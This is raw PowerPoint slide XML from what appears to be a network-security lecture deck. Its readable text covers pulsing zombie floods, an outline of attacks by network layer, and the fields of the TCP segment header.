            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="383540" indent="-342265">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="655"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="3365CC"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="383540" algn="l"/>
                <a:tab pos="384175" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:t>Pulsing zombie </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10"/>
              <a:t>floods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="784225" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="585"/>
              </a:spcBef>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="784225" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>each</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-3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zombie</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-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active</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-1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briefly,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then</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-1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goes</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>dormant;</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="783590" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="575"/>
              </a:spcBef>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="784225" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>zombies</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-2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taking</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-2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turns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 spc="-10">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>attacking</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="784225" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="575"/>
              </a:spcBef>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="784225" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>making</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-2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tracing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 spc="-10">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>difficult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44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B0BBB-C1B4-605D-F936-206619F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04043-F8A3-40A0-AD75-064CA998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1C704-55A3-B131-D212-671103C5ED3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908983" y="1250730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Network Vulnerabilities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51A50-AE5E-A16A-5486-FEA3EF1145F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908983" y="2312118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Application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2400" dirty="0"/>
              <a:t> Layer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2400" dirty="0" err="1"/>
              <a:t>Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-D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7103-6E6B-AB68-1DC5-F4171CC4AC15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908983" y="3373506"/>
            <a:ext cx="10925665" cy="7987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Transport Lay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>er Attacks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58FBA-15E7-E9DB-DFF8-C5130938CDEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908982" y="443489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Network Layer Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE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4147A-06D5-2161-B675-FC11C82D98D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908981" y="549628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Link Layer Attacks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12407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DD327-2BCC-4CC5-7BC0-1398BE3E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/>
              <a:t>TCP: overview  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0"/>
              <a:t>RFCs: 793,1122, 2018, 5681, 7323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51DC6-400F-42AA-C837-562B7F47D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EA3968-74BD-6C84-2CC8-F2F33538C923}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5949863" y="1355270"/>
            <a:ext cx="6012953" cy="553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cumulative ACKs</a:t>
            </a:r>
          </a:p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pipelining:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="919163" marR="0" lvl="2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congestion and flow control set window size</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="2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471488" marR="0" lvl="0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connection-oriented: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handshaking (exchange of control messages) initializes sender, receiver state before data exchange</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="471488" marR="0" lvl="0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controlled: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will not overwhelm receiver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1EA12BF-60A6-5F49-5A82-30235D7DB8EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="687960" y="1355270"/>
            <a:ext cx="538298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point-to-point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919163" marR="0" lvl="2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one sender, one receiver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reliable, in-order </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="32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byte steam:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="919163" marR="0" lvl="2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“</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP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boundaries"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="471488" marR="0" lvl="0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full duplex data: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bi-directional data flow in same connection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MSS: maximum segment size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94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35EE63-01F5-F051-16B9-3587D510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TCP segment structure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00BDB-F42B-DC73-A413-4DC3E477E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1FB61-8AC2-FD30-7C68-A49E9F616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073" y="1560062"/>
            <a:ext cx="3951287" cy="4824412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A33BEA-1808-369A-9E54-6237BA072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348" y="1675949"/>
            <a:ext cx="3951287" cy="480536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8A1014-A67A-00FC-7315-A2AFA31F6852}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4495573" y="1661303"/>
            <a:ext cx="3450544" cy="401997"/>
            <a:chOff x="4495573" y="1661303"/>
            <a:chExt cx="3450544" cy="401997"/>
          </a:xfrm>
        </p:grpSpPr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7FE54D33-2347-2E1A-0CB8-A836917F7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73" y="1661303"/>
              <a:ext cx="16637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source port #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69E89C08-3DA5-65CF-5E55-0343904A0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4992" y="1666425"/>
              <a:ext cx="1381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dest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port #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" name="Line 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13D7A032-FB0E-C162-B07B-7285C292E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9523" y="2050599"/>
            <a:ext cx="3946525" cy="47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836185A8-4ECE-8291-E4D0-9EFF9B196F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173" y="2430012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1032C-0938-9CC3-0802-2B68623E2CA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4324123" y="1145724"/>
            <a:ext cx="3935412" cy="366713"/>
            <a:chOff x="4324123" y="1145724"/>
            <a:chExt cx="3935412" cy="366713"/>
          </a:xfrm>
        </p:grpSpPr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B6EC70BC-EBBC-EEC9-2292-E1EC26D2E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2248" y="1145724"/>
              <a:ext cx="857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32 bits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C68CDBE1-9944-9AEC-B0BF-A1538E21D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2373" y="1391787"/>
              <a:ext cx="1427162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60517F95-35BD-BCBC-3E36-DDDB20B6214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324123" y="1402899"/>
              <a:ext cx="134143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2BE5F9E3-2C55-E74A-8559-2826B07050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52698" y="2811012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B97B102F-72E0-105D-AFA3-BF65F0C9C4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7935" y="3206299"/>
            <a:ext cx="39512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7500B2C3-FA5B-AB1B-05D3-37211CB61D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173" y="3596824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C1651412-67EA-7FD5-5C80-14F321483D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173" y="4158799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7DE53373-A984-0EC1-7D4A-46C80A2BBB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03735" y="2814187"/>
            <a:ext cx="4763" cy="7778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" name="Line 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5883335E-CAD6-1008-8282-6703AF3C3A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8735" y="2814187"/>
            <a:ext cx="0" cy="392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2" name="Line 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77B78057-FF3A-6F06-FF92-AB9DF745A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4748" y="2809424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3" name="Line 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D368BA94-3D8E-AB73-2315-51D7A9A2E1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5998" y="2818949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4" name="Text Box 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB6D61BB-B634-2579-9C14-822252A23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6966" y="2822952"/>
            <a:ext cx="482824" cy="40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not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used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5" name="Line 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C47A028C-C385-F33F-18BE-682577B02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3766" y="2809424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302277-CCBB-5A26-314F-985F89D76438}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6405335" y="2817362"/>
            <a:ext cx="5252586" cy="731484"/>
            <a:chOff x="6405335" y="2817362"/>
            <a:chExt cx="5252586" cy="731484"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="Text Box 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E79A27B6-8083-F9EA-A313-FB1492CA2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335" y="2817362"/>
              <a:ext cx="174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receive window</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Text Box 49">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20CB1520-D757-AB86-6C12-8281ED7C9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4900" y="2847115"/>
              <a:ext cx="2933021" cy="70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flow control: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# bytes receiver willing to accept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9" name="Line 53">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6D904BD-8BA1-630A-7428-56FF6949B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42852" y="3044701"/>
              <a:ext cx="582048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9B7322-9262-BFBA-B543-CDB9046484C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4979760" y="1674436"/>
            <a:ext cx="7040433" cy="1034129"/>
            <a:chOff x="4979760" y="1674436"/>
            <a:chExt cx="7040433" cy="1034129"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Text Box 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35E02485-7FB1-93DD-39B1-7EFDAA7D2A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760" y="2029962"/>
              <a:ext cx="24860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sequence number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2" name="Text Box 50">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFE452C4-1166-D550-1C1A-165C1BA1A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4900" y="1674436"/>
              <a:ext cx="3295293" cy="1034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segment seq  #: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counting bytes of data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into </a:t>
              </a:r>
              <a:r>
                <a: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bytestream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(not segments!)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3" name="Line 55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F1C6AF7-3CDB-A479-A0E7-6DDE481A44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924797" y="2244436"/>
              <a:ext cx="800102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B0155C-1D9E-A112-ECB8-B2E41C613797}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5398860" y="4614412"/>
            <a:ext cx="5770816" cy="1113459"/>
            <a:chOff x="5398860" y="4614412"/>
            <a:chExt cx="5770816" cy="1113459"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="Text Box 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33A40AFD-8162-CA0A-1E08-4019FE8DF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8860" y="4614412"/>
              <a:ext cx="2005013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data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(variable length)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E1D970-ED76-4539-1190-BD4C67C57021}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8980285" y="4638342"/>
              <a:ext cx="2189391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sent by application into TCP socket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FDAAE7-B793-EA2D-420A-951E69EAF5D7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6727821" y="5150307"/>
              <a:ext cx="2149479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C42618-3913-040F-85B3-F34E8093E05F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="230393" y="1952743"/>
            <a:ext cx="7771793" cy="1241280"/>
            <a:chOff x="230393" y="1952743"/>
            <a:chExt cx="7771793" cy="1241280"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="Text Box 35">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6175EF44-11ED-0D6D-44D1-C1AD623984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7297" y="2855469"/>
              <a:ext cx="30328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A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ACEA12-C2CF-B386-D2ED-93FE8847BABB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="230393" y="1952743"/>
              <a:ext cx="7771793" cy="971860"/>
              <a:chOff x="217867" y="1965269"/>
              <a:chExt cx="7771793" cy="971860"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="41" name="Text Box 17">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEF6458D-200A-1394-8A2C-F194AC8087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9710" y="2430012"/>
                <a:ext cx="34099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42" name="Text Box 42">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21E3F53F-BEDC-6EE7-7D91-8EE54A1BFF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867" y="1965269"/>
                <a:ext cx="3287333" cy="7017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ACK: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seq # of next expected byte; A bit: this is an ACK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" name="Line 46">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA29F310-7724-CBB2-8EE8-B8BB3EC36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200" y="2417523"/>
                <a:ext cx="2076276" cy="519606"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 0 w 2082626"/>
                  <a:gd name="connsiteY0" fmla="*/ 0 h 560881"/>
                  <a:gd name="connsiteX1" fmla="*/ 2082626 w 2082626"/>
                  <a:gd name="connsiteY1" fmla="*/ 560881 h 560881"/>
                  <a:gd name="connsiteX0" fmla="*/ 0 w 2076276"/>
                  <a:gd name="connsiteY0" fmla="*/ 0 h 519606"/>
                  <a:gd name="connsiteX1" fmla="*/ 2076276 w 2076276"/>
                  <a:gd name="connsiteY1" fmla="*/ 519606 h 51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6276" h="519606">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="694209" y="186960"/>
                      <a:pt x="1382067" y="332646"/>
                      <a:pt x="2076276" y="519606"/>
                    </a:cubicBezTo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" name="Line 46">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75785F63-2786-9669-2D6F-C4496ABFCA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200" y="2404996"/>
                <a:ext cx="1263476" cy="215853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A8A9C8-8483-4C76-14A0-F9E6AF6883AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1895418" y="3659802"/>
            <a:ext cx="5828956" cy="1090980"/>
            <a:chOff x="1895418" y="3659802"/>
            <a:chExt cx="5828956" cy="1090980"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="Text Box 40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06A3A3C0-A845-947F-9E26-073EB8F1D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0361" y="3659802"/>
              <a:ext cx="289401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options (variable length)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Text Box 42">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6375D8C7-16EB-CC7E-31AE-6AEAB0720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5418" y="4326050"/>
              <a:ext cx="1688926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TCP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options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A5CFE0-05D1-F2C9-FBC6-C4D5AB965244}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="47" idx="3"/>
              <a:endCxn id="46" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="3584344" y="3859857"/>
              <a:ext cx="1246017" cy="67855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F6D4C8-D24A-71F7-A12C-A5F04EABBCE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="318075" y="2819126"/>
            <a:ext cx="4456458" cy="424732"/>
            <a:chOff x="318075" y="2819126"/>
            <a:chExt cx="4456458" cy="424732"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50" name="Text Box 37">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73226843-6736-D43C-44B4-CADB6EC94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8884" y="2826980"/>
              <a:ext cx="495649" cy="407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head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len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51" name="Text Box 42">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{186D007E-01D3-CFF0-5C83-DDB82E384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075" y="2819126"/>
              <a:ext cx="3287333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length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(of TCP header)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C623B59-BBD0-F136-D76A-26992BE82BFF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3544867" y="3031480"/>
              <a:ext cx="783888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A1A5B3-51EC-8E7B-327C-0B96EDBAD9DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-24878" y="3174115"/>
            <a:ext cx="6031751" cy="424732"/>
            <a:chOff x="-24878" y="3174115"/>
            <a:chExt cx="6031751" cy="424732"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54" name="Text Box 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{496F7B38-7963-A3C6-19BE-C08451B49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4023" y="3203124"/>
              <a:ext cx="1212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checksum</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55" name="Text Box 51">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8946CF85-B50B-79EB-4016-B670BF1EF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878" y="3174115"/>
              <a:ext cx="3595495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Internet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checksum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0538E5B-28DF-4DD0-CD86-D9EE6B33347F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="55" idx="3"/>
              <a:endCxn id="54" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3570617" y="3386481"/>
              <a:ext cx="122340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Line 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBFCE2A4-EF7A-A16D-E7C7-C7CB2239D9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89447" y="1679374"/>
            <a:ext cx="1761" cy="36518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8" name="Line 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC50A516-785D-E357-7783-A6779499C4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0711" y="2804662"/>
            <a:ext cx="0" cy="392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9" name="Line 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33DC8602-DAA5-0F88-C81E-B9A559E971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92924" y="2809424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0" name="Line 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D7549DD-38B1-5A6D-8FEF-72F74640D7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0374" y="2809424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07A15FD-11C2-3B0C-8EAF-38B4D9D6E2BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="172543" y="2863949"/>
            <a:ext cx="6190466" cy="2660551"/>
            <a:chOff x="172543" y="2863949"/>
            <a:chExt cx="6190466" cy="2660551"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="Text Box 44">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6612D124-446C-97F5-88AC-25528FC88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543" y="4822769"/>
              <a:ext cx="3419248" cy="70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RST, SYN, FIN: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connection management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5955F4B7-6CA4-D253-B5F3-8082B983D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336" y="3152325"/>
              <a:ext cx="2678659" cy="2026938"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1458"/>
                <a:gd name="T1" fmla="*/ 2147483647 h 444"/>
                <a:gd name="T2" fmla="*/ 2147483647 w 1458"/>
                <a:gd name="T3" fmla="*/ 0 h 444"/>
                <a:gd name="T4" fmla="*/ 2147483647 w 1458"/>
                <a:gd name="T5" fmla="*/ 2147483647 h 444"/>
                <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 10533"/>
                <a:gd name="connsiteY0" fmla="*/ 10875 h 10875"/>
                <a:gd name="connsiteX1" fmla="*/ 9093 w 10533"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10875"/>
                <a:gd name="connsiteX2" fmla="*/ 10533 w 10533"/>
                <a:gd name="connsiteY2" fmla="*/ 135 h 10875"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 11345"/>
                <a:gd name="connsiteY0" fmla="*/ 13363 h 13363"/>
                <a:gd name="connsiteX1" fmla="*/ 9905 w 11345"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 13363"/>
                <a:gd name="connsiteX2" fmla="*/ 11345 w 11345"/>
                <a:gd name="connsiteY2" fmla="*/ 135 h 13363"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 11465"/>
                <a:gd name="connsiteY0" fmla="*/ 23977 h 23977"/>
                <a:gd name="connsiteX1" fmla="*/ 10025 w 11465"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 23977"/>
                <a:gd name="connsiteX2" fmla="*/ 11465 w 11465"/>
                <a:gd name="connsiteY2" fmla="*/ 135 h 23977"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 11405"/>
                <a:gd name="connsiteY0" fmla="*/ 28694 h 28694"/>
                <a:gd name="connsiteX1" fmla="*/ 9965 w 11405"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 28694"/>
                <a:gd name="connsiteX2" fmla="*/ 11405 w 11405"/>
                <a:gd name="connsiteY2" fmla="*/ 135 h 28694"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 11391"/>
                <a:gd name="connsiteY0" fmla="*/ 28694 h 28694"/>
                <a:gd name="connsiteX1" fmla="*/ 9965 w 11391"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 28694"/>
